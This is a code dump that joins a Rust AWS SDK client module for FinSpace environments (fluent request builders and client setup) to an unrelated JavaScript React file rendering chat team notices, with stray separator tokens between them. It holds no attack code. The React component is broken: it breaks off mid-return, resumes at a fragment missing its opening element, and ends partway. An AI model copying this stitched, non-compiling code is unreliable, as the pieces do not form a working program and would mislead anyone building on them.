/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ListTagsForResourceOutput::tags): <p>A list of all tags for a resource.</p>
/// - On failure, responds with [`SdkError<ListTagsForResourceError>`](crate::error::ListTagsForResourceError)
pub fn list_tags_for_resource(&self) -> fluent_builders::ListTagsForResource {
fluent_builders::ListTagsForResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`TagResource`](crate::client::fluent_builders::TagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::TagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::TagResource::set_resource_arn): <p>The Amazon Resource Name (ARN) for the resource.</p>
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::TagResource::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::TagResource::set_tags): <p>One or more tags to be assigned to the resource.</p>
/// - On success, responds with [`TagResourceOutput`](crate::output::TagResourceOutput)
/// - On failure, responds with [`SdkError<TagResourceError>`](crate::error::TagResourceError)
pub fn tag_resource(&self) -> fluent_builders::TagResource {
fluent_builders::TagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UntagResource`](crate::client::fluent_builders::UntagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::UntagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::UntagResource::set_resource_arn): <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
/// - [`tag_keys(Vec<String>)`](crate::client::fluent_builders::UntagResource::tag_keys) / [`set_tag_keys(Option<Vec<String>>)`](crate::client::fluent_builders::UntagResource::set_tag_keys): <p>The tag keys (names) of one or more tags to be removed.</p>
/// - On success, responds with [`UntagResourceOutput`](crate::output::UntagResourceOutput)
/// - On failure, responds with [`SdkError<UntagResourceError>`](crate::error::UntagResourceError)
pub fn untag_resource(&self) -> fluent_builders::UntagResource {
fluent_builders::UntagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateEnvironment`](crate::client::fluent_builders::UpdateEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_environment_id): <p>The identifier of the FinSpace environment.</p>
/// - [`name(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::name) / [`set_name(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_name): <p>The name of the environment.</p>
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_description): <p>The description of the environment.</p>
/// - [`federation_mode(FederationMode)`](crate::client::fluent_builders::UpdateEnvironment::federation_mode) / [`set_federation_mode(Option<FederationMode>)`](crate::client::fluent_builders::UpdateEnvironment::set_federation_mode): <p>Authentication mode for the environment.</p> <ul> <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li> <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li> </ul>
/// - [`federation_parameters(FederationParameters)`](crate::client::fluent_builders::UpdateEnvironment::federation_parameters) / [`set_federation_parameters(Option<FederationParameters>)`](crate::client::fluent_builders::UpdateEnvironment::set_federation_parameters): <p>Configuration information when authentication mode is FEDERATED.</p>
/// - On success, responds with [`UpdateEnvironmentOutput`](crate::output::UpdateEnvironmentOutput) with field(s):
/// - [`environment(Option<Environment>)`](crate::output::UpdateEnvironmentOutput::environment): <p>Returns the FinSpace environment object.</p>
/// - On failure, responds with [`SdkError<UpdateEnvironmentError>`](crate::error::UpdateEnvironmentError)
pub fn update_environment(&self) -> fluent_builders::UpdateEnvironment {
fluent_builders::UpdateEnvironment::new(self.handle.clone())
}
}
pub mod fluent_builders {
//!
//! Utilities to ergonomically construct a request to the service.
//!
//! Fluent builders are created through the [`Client`](crate::client::Client) by calling
    //! one of its operation methods. After parameters are set using the builder methods,
//! the `send` method can be called to initiate the request.
//!
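    //!
    //! A minimal usage sketch (the environment id below is a made-up placeholder):
    //!
    //! ```rust,no_run
    //! # async fn docs(client: aws_sdk_finspace::Client) {
    //! // Chain parameter setters on the builder, then call `send` to issue the request.
    //! let resp = client
    //!     .get_environment()
    //!     .environment_id("my-env-id") // hypothetical identifier
    //!     .send()
    //!     .await;
    //! # let _ = resp;
    //! # }
    //! ```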
/// Fluent builder constructing a request to `CreateEnvironment`.
///
/// <p>Create a new FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_environment_input::Builder,
}
impl CreateEnvironment {
/// Creates a new `CreateEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::CreateEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The name of the FinSpace environment to be created.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.name(input.into());
self
}
/// <p>The name of the FinSpace environment to be created.</p>
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_name(input);
self
}
/// <p>The description of the FinSpace environment to be created.</p>
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// <p>The description of the FinSpace environment to be created.</p>
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
pub fn kms_key_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.kms_key_id(input.into());
self
}
/// <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
pub fn set_kms_key_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_kms_key_id(input);
self
}
/// Adds a key-value pair to `tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// <p>Add tags to your FinSpace environment.</p>
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// <p>Add tags to your FinSpace environment.</p>
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn federation_mode(mut self, input: crate::model::FederationMode) -> Self {
self.inner = self.inner.federation_mode(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn set_federation_mode(
mut self,
input: std::option::Option<crate::model::FederationMode>,
) -> Self {
self.inner = self.inner.set_federation_mode(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn federation_parameters(mut self, input: crate::model::FederationParameters) -> Self {
self.inner = self.inner.federation_parameters(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn set_federation_parameters(
mut self,
input: std::option::Option<crate::model::FederationParameters>,
) -> Self {
self.inner = self.inner.set_federation_parameters(input);
self
}
/// <p>Configuration information for the superuser.</p>
pub fn superuser_parameters(mut self, input: crate::model::SuperuserParameters) -> Self {
self.inner = self.inner.superuser_parameters(input);
self
}
/// <p>Configuration information for the superuser.</p>
pub fn set_superuser_parameters(
mut self,
input: std::option::Option<crate::model::SuperuserParameters>,
) -> Self {
self.inner = self.inner.set_superuser_parameters(input);
self
}
/// Appends an item to `dataBundles`.
///
/// To override the contents of this collection use [`set_data_bundles`](Self::set_data_bundles).
///
/// <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p>
/// <ul>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li>
/// </ul>
pub fn data_bundles(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.data_bundles(input.into());
self
}
/// <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p>
/// <ul>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li>
/// </ul>
pub fn set_data_bundles(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_data_bundles(input);
self
}
}
/// Fluent builder constructing a request to `DeleteEnvironment`.
///
    /// <p>Delete a FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_environment_input::Builder,
}
impl DeleteEnvironment {
/// Creates a new `DeleteEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier for the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier for the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
}
/// Fluent builder constructing a request to `GetEnvironment`.
///
/// <p>Returns the FinSpace environment object.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct GetEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::get_environment_input::Builder,
}
impl GetEnvironment {
/// Creates a new `GetEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::GetEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::GetEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
}
/// Fluent builder constructing a request to `ListEnvironments`.
///
/// <p>A list of all of your FinSpace environments.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListEnvironments {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_environments_input::Builder,
}
impl ListEnvironments {
/// Creates a new `ListEnvironments`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListEnvironmentsOutput,
aws_smithy_http::result::SdkError<crate::error::ListEnvironmentsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
/// <p>The maximum number of results to return in this request.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// <p>The maximum number of results to return in this request.</p>
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
}
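    // Pagination sketch (illustrative, not part of the generated client): the
    // output's `next_token` feeds the next request until the service stops
    // returning one.
    //
    //     let mut token: Option<String> = None;
    //     loop {
    //         let mut req = client.list_environments();
    //         if let Some(t) = &token {
    //             req = req.next_token(t.clone());
    //         }
    //         let page = req.send().await?;
    //         // ...consume page.environments() here...
    //         token = page.next_token().map(String::from);
    //         if token.is_none() {
    //             break;
    //         }
    //     }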
/// Fluent builder constructing a request to `ListTagsForResource`.
///
/// <p>A list of all tags for a resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListTagsForResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_tags_for_resource_input::Builder,
}
impl ListTagsForResource {
/// Creates a new `ListTagsForResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListTagsForResourceOutput,
aws_smithy_http::result::SdkError<crate::error::ListTagsForResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The Amazon Resource Name of the resource.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>The Amazon Resource Name of the resource.</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
}
/// Fluent builder constructing a request to `TagResource`.
///
/// <p>Adds metadata tags to a FinSpace resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct TagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::tag_resource_input::Builder,
}
impl TagResource {
/// Creates a new `TagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::TagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::TagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The Amazon Resource Name (ARN) for the resource.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>The Amazon Resource Name (ARN) for the resource.</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Adds a key-value pair to `tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// <p>One or more tags to be assigned to the resource.</p>
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// <p>One or more tags to be assigned to the resource.</p>
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `UntagResource`.
///
/// <p>Removes metadata tags from a FinSpace resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UntagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::untag_resource_input::Builder,
}
impl UntagResource {
/// Creates a new `UntagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UntagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::UntagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Appends an item to `tagKeys`.
///
/// To override the contents of this collection use [`set_tag_keys`](Self::set_tag_keys).
///
/// <p>The tag keys (names) of one or more tags to be removed.</p>
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.tag_keys(input.into());
self
}
/// <p>The tag keys (names) of one or more tags to be removed.</p>
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_tag_keys(input);
self
}
}
/// Fluent builder constructing a request to `UpdateEnvironment`.
///
/// <p>Update your FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_environment_input::Builder,
}
impl UpdateEnvironment {
/// Creates a new `UpdateEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
/// <p>The name of the environment.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.name(input.into());
self
}
/// <p>The name of the environment.</p>
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_name(input);
self
}
/// <p>The description of the environment.</p>
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// <p>The description of the environment.</p>
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn federation_mode(mut self, input: crate::model::FederationMode) -> Self {
self.inner = self.inner.federation_mode(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn set_federation_mode(
mut self,
input: std::option::Option<crate::model::FederationMode>,
) -> Self {
self.inner = self.inner.set_federation_mode(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn federation_parameters(mut self, input: crate::model::FederationParameters) -> Self {
self.inner = self.inner.federation_parameters(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn set_federation_parameters(
mut self,
input: std::option::Option<crate::model::FederationParameters>,
) -> Self {
self.inner = self.inner.set_federation_parameters(input);
self
}
}
}
impl Client {
/// Creates a client with the given service config and connector override.
pub fn from_conf_conn<C, E>(conf: crate::Config, conn: C) -> Self
where
C: aws_smithy_client::bounds::SmithyConnector<Error = E> + Send + 'static,
E: Into<aws_smithy_http::result::ConnectorError>,
{
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::new()
.connector(aws_smithy_client::erase::DynConnector::new(conn))
.middleware(aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
));
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Creates a new client from a shared config.
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn new(sdk_config: &aws_types::sdk_config::SdkConfig) -> Self {
Self::from_conf(sdk_config.into())
}
/// Creates a new client from the service [`Config`](crate::Config).
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn from_conf(conf: crate::Config) -> Self {
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::dyn_https().middleware(
aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
),
);
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
// the builder maintains a try-state. To avoid suppressing the warning when sleep is unset,
// only set it if we actually have a sleep impl.
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
}
|
with_config
|
index.js
|
// @flow
import * as React from 'react'
import {Box, Text, ConnectedUsernames, Icon, TimelineMarker} from '../../../../common-adapters'
import {EmojiIfExists} from '../../../../common-adapters/markdown.shared'
import UserNotice from '../../notices/user-notice'
import {globalStyles, globalColors, globalMargins} from '../../../../styles'
import {formatTimeForMessages} from '../../../../util/timestamp'
import {isAndroid, isMobile} from '../../../../constants/platform'
import type {
SystemMessage,
AddedToTeamInfo,
SimpleToComplexTeamInfo,
InviteAcceptedInfo,
GitPushInfo,
} from '../../../../constants/types/chat'
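// Default props reused by the <ConnectedUsernames> instances below.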
const connectedUsernamesProps = {
clickable: true,
inline: true,
colorFollowing: true,
type: 'BodySmallSemibold',
underline: true,
}
type Props = {
admin: boolean,
channelname: string,
isBigTeam: boolean,
message: SystemMessage,
onClickUserAvatar: (username: string) => void,
onManageChannels: (teamname: string) => void,
onViewTeam: (teamname: string) => void,
onViewGitRepo: (repoID: string, teamname: string) => void,
teamname: string,
you: string,
}
type AddedToTeamProps = Props & {info: AddedToTeamInfo}
const AddedToTeamNotice = ({
admin,
channelname,
isBigTeam,
message,
info,
onClickUserAvatar,
onManageChannels,
onViewTeam,
you,
}: AddedToTeamProps) => {
const {adder, addee, team} = info
const adderComponent =
adder === you ? 'You' : <ConnectedUsernames {...connectedUsernamesProps} usernames={[adder]} />
const selfAddee = adder === you ? 'yourself' : 'you'
const addeeComponent =
addee === you ? selfAddee : <ConnectedUsernames {...connectedUsernamesProps} usernames={[addee]} />
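  // Choose the footer link: channel management when you were added to a big team,
  // member management for admins, and a read-only member list otherwise.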
let manageComponent = null
if (addee === you && isBigTeam) {
manageComponent = (
<Text
onClick={() => onManageChannels(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage your channel subscriptions
</Text>
)
} else if (admin) {
manageComponent = (
<Text
onClick={() => onViewTeam(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage members
</Text>
)
} else {
manageComponent = (
<Text
onClick={() => onViewTeam(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
See all members
</Text>
)
}
return (
<UserNotice
style={{marginTop: globalMargins.small}}
username={you !== addee ? addee : undefined}
teamname={you === addee ? team : undefined}
onClickAvatar={you !== addee ? () => onClickUserAvatar(addee) : () => onViewTeam(team)}
bgColor={globalColors.blue4}
>
{you === addee && (
<Icon type="icon-team-sparkles-48-40" style={{marginTop: -36, width: 48, height: 40}} />
)}
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={{...globalStyles.flexBoxColumn, alignItems: 'center'}}>
<Text
type="BodySmallSemibold"
backgroundMode="Announcements"
style={{color: globalColors.black_40, textAlign: 'center'}}
>
{adderComponent} added {addeeComponent} to{' '}
<Text type="BodySmallSemibold" style={{color: globalColors.black_60}}>
{team}
</Text>
.{' '}
{you === addee && (
<Text type="BodySmallSemibold">
Say hi!{' '}
<EmojiIfExists
style={{display: isMobile ? 'flex' : 'inline-block'}}
emojiName=":wave:"
size={14}
/>
</Text>
)}
</Text>
{manageComponent}
</Box>
</UserNotice>
)
}
type ComplexTeamProps = Props & {info: SimpleToComplexTeamInfo}
const ComplexTeamNotice = ({
channelname,
message,
info,
onManageChannels,
onViewTeam,
you,
}: ComplexTeamProps) => {
const teamname = info.team
const authorComponent =
message.author === you ? (
'You'
) : (
<ConnectedUsernames
clickable={true}
inline={true}
type="BodySmallSemibold"
colorFollowing={true}
usernames={[message.author]}
/>
)
return (
|
bgColor={globalColors.blue4}
onClickAvatar={() => onViewTeam(teamname)}
>
<Text
type="BodySmallSemibold"
backgroundMode="Announcements"
style={{color: globalColors.black_40, marginTop: globalMargins.tiny}}
>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={globalStyles.flexBoxColumn}>
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
{authorComponent} made {teamname} a big team!
</Text>
